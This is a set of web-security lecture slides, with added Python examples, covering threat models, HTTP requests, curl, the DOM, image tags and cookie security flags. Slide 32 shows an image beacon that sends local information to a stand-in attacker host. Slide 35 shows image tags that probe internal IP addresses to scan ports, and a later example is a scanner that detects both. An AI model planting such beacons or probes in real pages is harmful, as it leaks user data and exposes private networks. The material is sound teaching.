CSE484/CSE584 BASIC WEB SECURITY MODEL Dr. Benjamin Livshits Web - - PowerPoint PPT Presentation

SLIDE 1

CSE484/CSE584

BASIC WEB SECURITY MODEL

Dr. Benjamin Livshits
SLIDE 2

Web Security

Web Attacker: sets up a malicious site visited by the victim (Alice); no control of the network.

SLIDE 3

Network Security

Network Attacker: intercepts and controls network communication to and from Alice.

SLIDE 4

Web Malware Attacker

Malware Attacker: escapes the browser to wreak havoc on Alice's machine.

SLIDE 5

Web Threat Models

• Web attacker
  • Controls https://attacker.com
  • Can obtain an SSL/TLS certificate for https://attacker.com
  • User visits attacker.com
  • Or: runs attacker's Facebook app, etc.
• Network attacker
  • Passive: wireless eavesdropper
  • Active: evil router, DNS poisoning
• Malware attacker
  • Attacker escapes browser isolation mechanisms and runs separately under control of the OS

This is what connects the world of web attacks to the low-level memory-based exploitation we've seen so far.

SLIDE 6

Goals of Web Security

Safely browse the web
• Users should be able to visit a variety of web sites, without incurring harm:
  • No stolen information such as login credentials or cookies
  • Site A cannot compromise session at Site B

Support secure web applications
• Applications delivered over the web should have the same security properties we require for stand-alone applications
• Maybe even better properties, because most web applications enjoy the protection provided by memory-safe languages

We will see a lot of Java and PHP and JavaScript, but not C or C++.

SLIDE 7

Looking Ahead

• HTTP
• Rendering content
• Cookies
• Isolation
• Communication
• Navigation
• Security user interface
• Frames and frame busting

SLIDE 8

HTTP

SLIDE 9

URLs or URIs

• Global identifiers of network-retrievable documents
• Example:

  https://courses.cs.washington.edu:80/courses/cse484/14au/#schedule

  Protocol: https; Hostname: courses.cs.washington.edu; Port: 80; Path: /courses/cse484/14au/; Fragment: #schedule

• Special characters are encoded as hex:
  • %0A = newline
  • %20 or + = space, %2B = + (special exception)
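The following Python is an added example, not part of the lecture slides: it splits the slide's example URL into the five components labelled above and applies the encoding rules from the same slide (%0A, %20 versus +, %2B) to constructed sample strings. Only urllib.parse from the standard library is used; the helper names are my own.

```python
# Added example (not from the lecture slides): parse the slide's example URL into
# its components and show the percent-encoding rules from the same slide.
from urllib.parse import urlsplit, quote, quote_plus, unquote, unquote_plus

# The example URL from the slide.
EXAMPLE_URL = "https://courses.cs.washington.edu:80/courses/cse484/14au/#schedule"


def parse_url(url):
    """Split a URL into the five parts named on the slide.

    Port is None when the URL carries no explicit port. The fragment is never
    sent to the server, which is why it is worth tracking separately.
    """
    parts = urlsplit(url)
    return {
        "protocol": parts.scheme,
        "hostname": parts.hostname,
        "port": parts.port,
        "path": parts.path,
        "fragment": parts.fragment,
    }


def encode_query_value(value, form_style=True):
    """Percent-encode one value for a query string or form body.

    form_style=True follows application/x-www-form-urlencoded: a space becomes
    '+', so a literal '+' must become %2B (the "special exception" on the
    slide). form_style=False uses %20 for the space instead; '+' is still %2B.
    """
    return quote_plus(value) if form_style else quote(value)


def decode_query_value(encoded, form_style=True):
    """Inverse of encode_query_value. Using the wrong decoder silently changes
    the data: unquote() leaves '+' as a literal plus sign."""
    return unquote_plus(encoded) if form_style else unquote(encoded)


if __name__ == "__main__":
    print(parse_url(EXAMPLE_URL))
    raw = "2+2 = 4\n"                             # constructed sample value
    print(encode_query_value(raw))                # 2%2B2+%3D+4%0A
    print(encode_query_value(raw, False))         # 2%2B2%20%3D%204%0A
    print(decode_query_value("a+b%2Bc"))          # a b+c
    print(decode_query_value("a+b%2Bc", False))   # a+b+c
```

The last two calls show why the "special exception" matters: the same bytes decode to different strings depending on whether the receiver treats '+' as a space, so encoder and decoder must agree on the convention.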

SLIDE 10

Short and Long URLs

Bit.ly: http://bit.ly/1vEIGks

http://longurlmaker.com:

http://www.longurlmaker.com/go?id=7continuedg20fIs.gd0GetShortyagl56001drawn%2Boutu6lingeringShortlinksX.sestretchedd7lingeringzc8faraway0UrlTeajbstretched15jcontinued011expanded86v3stretchedqdXil40ShortenURLkXilz401spun%2Boutq54bextensiveShrtndwoutstretched151TinyLinkcontinued2lastingdltallaU76nr0h61g5aIs.gdd0141cMooURL085ShortURLcShortenURL40stretchrangyXil3p17hSitelutionsuwURLvi1enlargedc03743186701Dwarfurl4aefwextensive0EasyURL315continuedbprotractedb19GetShorty2SHurl171enduring038r8bURLviremote6URL1ShortURLspun%2Boutelongated0aX.seoutstretched0d4distantSimURL27highd418olasting9ShoterLink8stretchedoSHurl4lankydrawn%2Bout0drawn%2Boutlofty19a2kenduringShortenURLxs0spread%2Bout9distantFly2d10101great0w78NutshellURL190Minilienstretchedn0stretchd0ShortenURL0enlargedtallX.seelongated9URL.co.ukspun%2BoutURLvi8e1012Shim00Ulimit7lasting3Shim034far%2Boff47spun%2Bout17nwelongated17a99eeexpandedtallm9MooURL1dremote46URL11NutshellURLStartURLb5itall40c6Shrinkr0Fly2lasting91n8clengthened51X.se5Minilien2ShredURLBeam.to99continued131G8L1ffarawaycontinued0distantrangy7c04964300315a2RubyURLfU76154j1roh82lengthened0faraway1z4outstretched1lr1B654301URL09stringyq8ShrinkURL184h7Dwarfurldrunningloftylingering18spread%2Bout68101ShortURL10kalengthy9B653ab41fextensive0prolonged7p11expandedprolongedremotec2Minilien0dB65stretchingarfaraway3extensive1yclnk.in9lankygreat50TightURL173cURL.co.ukmba2049815920prolonged8fprotractedf0stringy6i164eelongatedMiniliene9elongated0PiURL1488gd2020a30far%2Breachinglengthy216d411t691elongate16extensived0drawn%2Bout11lankyYepItB65Shim31extensiveURLCutterShim99GetShorty1042Fly2af0e8protractedelongatey0111563FhURL9c3TinyURLn8toweringDwarfurl10d6350c5TightURL3lnk.in03Shrtnd6g0lingering18ganglingprolonged8astringy7StartURL100TraceURLSmallr01drawn%2Bout60ganglingstringy80Beam.tocdistantsG8LX.sedrawn%2Boutedrawn%2Bouty040SitelutionsU7601drawn%2Bout6f53A2N2lasting1194stretchinggangling20lnk.inURLCutter135b80b3ShortURL6far%2Boffm013q515deep8WapURLShrinkURLd410090lnk.infar%2Boff701far%2Boff96lingering8a6x38118Redirxfar%2Breaching1stretched0protracted16t0l21130b90106zShoterLink967Smallr9R

SLIDE 11

HTTP Request

GET /index.html HTTP/1.1
Accept: image/gif, image/x-bitmap, image/jpeg, */*
Accept-Language: en
Connection: Keep-Alive
User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)
Host: www.example.com
Referer: http://www.google.com?q=dingbats

Parts of the request: Method, File (path), HTTP version, Headers, Blank line, Data (none for GET)

GET: no side effect
POST: possible side effect

SLIDE 12

POST

POST /pass.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://127.0.0.1/pass.php
Cookie: passx=87e8af376bc9d9bfec2c7c0193e6af70; PHPSESSID=l9hk7mfh0ppqecg8gialak6gt5
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

username=zurfyx&pass=password
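As an added example (not from the slides), the Python below parses a raw HTTP/1.1 request of the shape shown on slides 11 and 12, decodes a form body, and enforces slide 11's GET/POST rule on the server side. The request text, the credential and cookie values, and the list of state-changing endpoints are constructed for this example.

```python
# Added example (not from the slides): parse a raw HTTP/1.1 request and apply
# the "GET has no side effect" rule from slide 11 on the server side.
from urllib.parse import parse_qsl

# Constructed sample requests modelled on slides 11 and 12 (made-up values).
SAMPLE_POST = (
    "POST /pass.php HTTP/1.1\r\n"
    "Host: 127.0.0.1\r\n"
    "Cookie: PHPSESSID=examplesessionid\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 26\r\n"
    "\r\n"
    "username=alice&pass=s3cret"
)
SAMPLE_GET = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "Referer: http://www.google.com?q=dingbats\r\n"
    "\r\n"
)

# Hypothetical endpoints that change server state (login, money transfer, ...).
SIDE_EFFECT_PATHS = {"/pass.php", "/transfer"}


def parse_request(raw):
    """Split a request into request line, headers and body.

    Header names are lower-cased because HTTP header names are case-insensitive.
    The body is cut to Content-Length and a short body is rejected; anything
    beyond Content-Length is not part of this request.
    """
    head, sep, body = raw.partition("\r\n\r\n")
    if not sep:
        raise ValueError("request has no blank line terminating the headers")
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")     # split at the first colon only
        headers[name.strip().lower()] = value.strip()
    length = int(headers.get("content-length", "0"))
    body_bytes = body.encode()
    if len(body_bytes) < length:
        raise ValueError("body shorter than Content-Length")
    return {
        "method": method,
        "target": target,
        "version": version,
        "headers": headers,
        "body": body_bytes[:length].decode(),
    }


def parse_form(body):
    """Decode an application/x-www-form-urlencoded body into a dict."""
    return dict(parse_qsl(body, keep_blank_values=True))


def check_method(req):
    """Slide 11's rule enforced server-side: a GET must not cause side effects,
    so a state-changing endpoint only accepts POST. Returns an HTTP status."""
    path = req["target"].split("?", 1)[0]
    if path in SIDE_EFFECT_PATHS and req["method"] != "POST":
        return 405          # Method Not Allowed
    return 200


if __name__ == "__main__":
    req = parse_request(SAMPLE_POST)
    print(req["method"], req["target"], req["headers"]["host"])
    print(parse_form(req["body"]))      # {'username': 'alice', 'pass': 's3cret'}
    print(check_method(req))            # 200
```

Refusing state changes over GET is what makes the "no side effect" convention enforceable: a browser prefetch, a cached link or an image tag pointing at a state-changing URL cannot then trigger the action.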

SLIDE 13

Automation with CURL

• curl --data "birthyear=1905&press=%20OK%20" http://www.example.com/when.cgi
• curl --data-urlencode "name=I am Daniel" http://www.example.com
• Submit/POST binary data to a URL:
  curl -X POST --data-binary @myfile.bin http://foo.com

SLIDE 14

HTTP Response

HTTP/1.0 200 OK
Date: Sun, 21 Apr 1996 02:20:42 GMT
Server: Microsoft-Internet-Information-Server/5.0
Connection: keep-alive
Content-Type: text/html
Last-Modified: Thu, 18 Apr 1996 17:39:05 GMT
Set-Cookie: …
Content-Length: 2543

<HTML> Some data... blah, blah, blah </HTML>

Parts of the response: HTTP version, Status code, Reason phrase, Headers (including Cookies), Data

SLIDE 15

Common HTTP Codes

• 200 OK
• 300 Multiple Choices
• 301 Moved Permanently
• 302 Found
• 304 Not Modified
• 307 Temporary Redirect
• 400 Bad Request
• 401 Unauthorized
• 403 Forbidden
• 404 Not Found
• 410 Gone
• 500 Internal Server Error
• 501 Not Implemented
• 503 Service Unavailable
• 550 Permission denied

SLIDE 16

Browser Tools

SLIDE 17

Watch the HTTP Traffic

SLIDE 18

HTTP Supports Caching

SLIDE 19

And Responses Can Be Interesting

SLIDE 20

And Surprising…

SLIDE 21

Interacting with Google using CURL

1. Authenticate with Google first

curl https://www.google.com/accounts/ClientLogin --data-urlencode Email=you@gmail.com --data-urlencode Passwd=yourpasswd -d accountType=GOOGLE -d source=your.org-your.service-your.service.version -d service=wise

SID=DQAAANcAAABjXXX; LSID=DQAAANoAXXX; Auth=DQAAANkAXXX

2. Get your spreadsheets

curl --silent --header "Authorization: GoogleLogin auth=DQAAANkAXXX" "https://spreadsheets.google.com/feeds/spreadsheets/private/full" | tidy -xml -indent -quiet

3. Get a particular spreadsheet

curl --silent --header "Authorization: GoogleLogin auth=$AUTH" "https://spreadsheets.google.com/feeds/download/spreadsheets/Export?key=$KEY&exportFormat=tsv" | sort -n -k 15 -t $'\t'
SLIDE 22

Rendering Content

SLIDE 23

Rendering and Events

• Each browser window or frame…
  • Loads content
  • Renders it
    • Processes HTML and scripts to display page
    • May involve images, sub-frames, etc.
  • Responds to events
• Events can be
  • User actions: OnClick, OnMouseover
  • Rendering: OnLoad, OnBeforeUnload
  • Timing: setTimeout(), clearTimeout()

SLIDE 24

Connecting it All Together

SLIDE 25

Slightly More Complex…

SLIDE 26

Document Object Model (DOM)

Object-oriented interface used to read and write docs
• Web page in HTML is structured data
• DOM provides representation of this hierarchy

Includes Browser Object Model (BOM)
• window
• document
• frames[]
• history
• location
• navigator (type and version of browser)

SLIDE 27

Deep DOM Trees

SLIDE 28

Pre-Year 2000

SLIDE 29

Pre-Year 2000: Functionality Added Via JavaScript

SLIDE 30

Changing HTML using JavaScript, DOM

• Some possibilities
  • createElement(elementName)
  • createTextNode(text)
  • appendChild(newChild)
  • removeChild(node)
• Example: add a new list item:

HTML:
<ul id="t1">
  <li> Item 1 </li>
</ul>

JavaScript:
var list = document.getElementById('t1')
var newitem = document.createElement('li')
var newtext = document.createTextNode(text)   // text: the string for the new item
list.appendChild(newitem)
newitem.appendChild(newtext)

SLIDE 31

HTML Image Tags

<html>
…
<p> … </p>
…
<img src="http://example.com/sunset.gif" height="50" width="100">
…
</html>

Any security issues?

SLIDE 32

Image Beacons

• Communicate with other sites:
  <img src="http://evil.com/pass-local-information.jpg?extra_information">
• Hide resulting image:
  <img src="…" height="1" width="1">
• Spoof other sites: add logos that fool a user

SLIDE 33

Beacons in Practice

SLIDE 34

onError in JavaScript

• Triggered in case of error
• Can register a JavaScript handler

<img src="image.gif" onerror="alert('The image couldn’t be loaded.')">

SLIDE 35

Port Scanning Behind A Firewall

• JavaScript can:
  • Request images from internal IP addresses
    • Example: <img src="192.168.0.4:8080"/>
  • Use timeout/onError to determine success/failure
  • Fingerprint webapps using known image names

Diagram (malicious web page, browser, firewall, internal servers): 1) "show me dancing pigs!" (the browser requests the malicious page); 2) "check this out" (the page is delivered to the browser); the browser then scans servers behind the firewall; 3) port scan results go back to the malicious page.
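On the detection side, as an added example that is not part of the slides: a Python scanner over a constructed HTML page that flags the <img> patterns from slides 32 and 35, namely 1x1 images, cross-origin images carrying a query string, and images whose host is a private IP address. The page content and host names are made up; the scanner uses only the standard library.

```python
# Added example (not from the slides): flag <img> tags that look like the
# beacons of slide 32 or the internal-address probes of slide 35.
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample page; hosts and paths are made up for this example.
SAMPLE_PAGE = """
<html><body>
<img src="http://example.com/sunset.gif" height="50" width="100">
<img src="http://evil.example/pass-local-information.jpg?user=alice" height="1" width="1">
<img src="http://192.168.0.4:8080/favicon.ico">
<img src="/static/logo.png">
</body></html>
"""


class ImgCollector(HTMLParser):
    """Collect the attributes of every <img> tag in the document."""

    def __init__(self):
        super().__init__()
        self.images = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.images.append(dict(attrs))


def _is_private_host(host):
    """True when host is an IP literal in private (RFC 1918 / loopback) space."""
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:          # a DNS name, not an IP literal
        return False


def find_suspicious_images(html, page_host):
    """Return (src, reason) pairs for images worth a second look.

    A relative src resolves against the page itself, so it is treated as
    same-origin. Each image can produce more than one reason.
    """
    parser = ImgCollector()
    parser.feed(html)
    findings = []
    for img in parser.images:
        src = img.get("src", "")
        parts = urlsplit(src)
        host = parts.hostname or page_host
        reasons = []
        if img.get("width") == "1" and img.get("height") == "1":
            reasons.append("1x1 image")            # hidden beacon (slide 32)
        if host != page_host and parts.query:
            reasons.append("cross-origin image with query string")
        if _is_private_host(host):
            reasons.append("private address")      # internal probe (slide 35)
        for reason in reasons:
            findings.append((src, reason))
    return findings


if __name__ == "__main__":
    for src, reason in find_suspicious_images(SAMPLE_PAGE, "example.com"):
        print(f"{reason}: {src}")
```

Such a scan is only a heuristic (legitimate analytics pixels match it too), but run over the markup a site actually serves, or over injected content found during an incident, it points straight at the tags that leak data outward or probe inward.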

SLIDE 36

Break…

SLIDE 37

Cookies: Client State

SLIDE 38

Cookies: Browser State

Server to browser (HTTP response header):
Set-Cookie: NAME=VALUE; domain=(who can read); expires=(when expires); secure=(only over SSL)

Browser to server (on later requests):
Cookie: NAME=VALUE

HTTP is a stateless protocol; cookies add state.
If expires=NULL: this session only.

SLIDE 39

Cookie-Based Authentication

Browser, web server and auth server:
1. Browser → Web server: POST login.cgi (username & pwd)
2. Web server → Auth server: validate user
3. Auth server → Web server: auth=val (web server stores val)
4. Web server → Browser: Set-Cookie: auth=val
5. Browser → Web server: GET restricted.html with Cookie: auth=val
6. Web server → Auth server: check val (auth=val)
7. Auth server → Web server: YES/NO
8. If YES, web server returns restricted.html

SLIDE 40

Cookie Security Policy

• Uses:
  • User authentication
  • Personalization
  • User tracking: e.g. Doubleclick (3rd party cookies)
• Browser will store:
  • At most 20 cookies/site, 3 KB / cookie
• Origin is the tuple <domain, path>
• Can set cookies valid across a domain suffix

SLIDE 41

Cookies From www.marketplace.org

SLIDE 42

Secure Cookies

Browser: GET …
Server response header:
Set-Cookie: NAME=VALUE; Secure=true

• Provides confidentiality against network attacker
  • Browser will only send cookie back over HTTPS
• No integrity
  • Can rewrite secure cookies over HTTP
  • Network attacker can rewrite secure cookie
  • Can log user into attacker's account

SLIDE 43

A Real Secure Set-Cookie Request

SLIDE 44

httpOnly Cookies

Browser: GET …
Server response header:
Set-Cookie: NAME=VALUE; httpOnly

• Cookie sent over HTTP(S), but not accessible to scripts
  • cannot be read via document.cookie
• Helps prevent cookie theft via XSS
• … but does not stop most other risks of XSS bugs
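To tie slides 38 through 44 together, here is an added Python example (not from the slides) of a miniature cookie jar that applies the browser rules described: domain-suffix and path matching from slide 40, Secure cookies only returned over HTTPS and the lack of integrity from slide 42, and httpOnly cookies hidden from document.cookie from slide 44. Expiry is not modelled and the default path is simplified to "/"; cookie names, values and host names are constructed. The optional leave_secure_cookies_alone flag models the later browser rule (RFC 6265bis "Leave Secure Cookies Alone") that rejects a plain-HTTP Set-Cookie overwriting a Secure cookie, which the classic behaviour on slide 42 lacks.

```python
# Added example (not from the slides): a small browser-side cookie jar that
# applies the policy rules from slides 38, 40, 42 and 44.
from urllib.parse import urlsplit


class CookieJar:
    def __init__(self, leave_secure_cookies_alone=False):
        # False models the classic behaviour on slide 42: a plain-HTTP
        # Set-Cookie can overwrite a Secure cookie. True models the later
        # "Leave Secure Cookies Alone" rule (RFC 6265bis).
        self.strict = leave_secure_cookies_alone
        self.cookies = {}     # (domain, path, name) -> cookie dict

    def set_cookie(self, header, response_url):
        """Process one Set-Cookie header received in a response from response_url.

        Returns True if the cookie was stored, False if the policy rejected it.
        """
        parts = urlsplit(response_url)
        host = parts.hostname
        pairs = [p.strip() for p in header.split(";")]
        name, _, value = pairs[0].partition("=")
        cookie = {"name": name, "value": value, "domain": host,
                  "path": "/", "secure": False, "httponly": False}
        for attr in pairs[1:]:
            key, _, val = attr.partition("=")
            key = key.strip().lower()
            if key == "domain":
                val = val.strip().lstrip(".").lower()
                # A site may only set cookies for itself or a domain suffix of itself.
                if not (host == val or host.endswith("." + val)):
                    return False
                cookie["domain"] = val
            elif key == "path":
                cookie["path"] = val.strip() or "/"
            elif key == "secure":          # bare "Secure" or the slide's "Secure=true"
                cookie["secure"] = True
            elif key == "httponly":
                cookie["httponly"] = True
        key = (cookie["domain"], cookie["path"], name)
        old = self.cookies.get(key)
        if self.strict and old and old["secure"] and parts.scheme != "https":
            return False      # refuse to overwrite a Secure cookie over plain HTTP
        self.cookies[key] = cookie
        return True

    def _matches(self, c, parts):
        host = parts.hostname
        path = parts.path or "/"
        domain_ok = host == c["domain"] or host.endswith("." + c["domain"])
        path_ok = path.startswith(c["path"])
        secure_ok = not c["secure"] or parts.scheme == "https"
        return domain_ok and path_ok and secure_ok

    def cookie_header(self, request_url):
        """Build the Cookie: header value the browser would send to request_url."""
        parts = urlsplit(request_url)
        return "; ".join(f'{c["name"]}={c["value"]}' for c in self.cookies.values()
                         if self._matches(c, parts))

    def document_cookie(self, page_url):
        """What script running on page_url sees in document.cookie (no httpOnly)."""
        parts = urlsplit(page_url)
        return "; ".join(f'{c["name"]}={c["value"]}' for c in self.cookies.values()
                         if self._matches(c, parts) and not c["httponly"])


if __name__ == "__main__":
    jar = CookieJar()
    jar.set_cookie("auth=val; Secure; HttpOnly", "https://www.example.com/login")
    jar.set_cookie("prefs=dark; Domain=example.com; Path=/", "https://www.example.com/")
    print(jar.cookie_header("https://www.example.com/restricted.html"))  # auth=val; prefs=dark
    print(jar.cookie_header("http://www.example.com/restricted.html"))   # prefs=dark
    print(jar.document_cookie("https://www.example.com/"))               # prefs=dark
    # Slide 42: a plain-HTTP response can still replace the Secure cookie.
    jar.set_cookie("auth=attacker", "http://www.example.com/")
    print(jar.cookie_header("https://www.example.com/"))                 # auth=attacker; prefs=dark
```

The last two lines of the usage are the slide-42 point in code: Secure stops the cookie from leaking over HTTP, but without the strict flag nothing stops an HTTP response from replacing it, which is how a network attacker logs the user into an account of the attacker's choosing. Pairing Secure with httpOnly, and relying on browsers that implement the strict rule, closes both halves.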